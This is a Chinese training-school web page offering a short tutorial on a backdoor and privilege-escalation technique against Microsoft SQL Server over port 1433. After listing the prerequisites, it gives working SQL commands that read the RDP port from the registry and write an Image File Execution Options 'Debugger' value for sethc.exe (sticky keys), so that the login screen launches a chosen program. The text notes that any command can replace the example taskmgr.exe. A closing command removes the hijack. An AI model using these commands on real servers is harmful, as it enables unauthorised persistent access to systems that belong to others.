北大青鸟数据库技术：1433映像劫持后门提权。

1.服务器开启了终端端口(终端端口未必是3389,可以自行查询)

2.服务器的粘滞键功能无损,只要可以正常弹出即可

3.服务器未禁止注册表编辑(即写入功能)

sql命令读取服务器终端端口:

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-

Tcp','PortNumber'

1.sql命令查询注册表粘滞键是否被劫持

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'

2.sql命令劫持注册表粘滞键功能,替换成任务管理器(当然你也可以替换成你想要的其他命令)

xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',

'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'

3.sql命令删除注册表粘滞键的劫持功能保护你的服务器不再被他人利用

xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'

了解更多北大青鸟数据库技术请继续关注武汉北大青鸟官网。

看过该数据库技术教程的还看过

本文标题：北大青鸟数据库技术 1433映像劫持后门提权，责任编辑：宏鹏，来源：武汉北大青鸟鲁广校区栏目，于04-23发布于北大青鸟鲁广校区。北大青鸟数据库技术：1433映像劫持后门提权。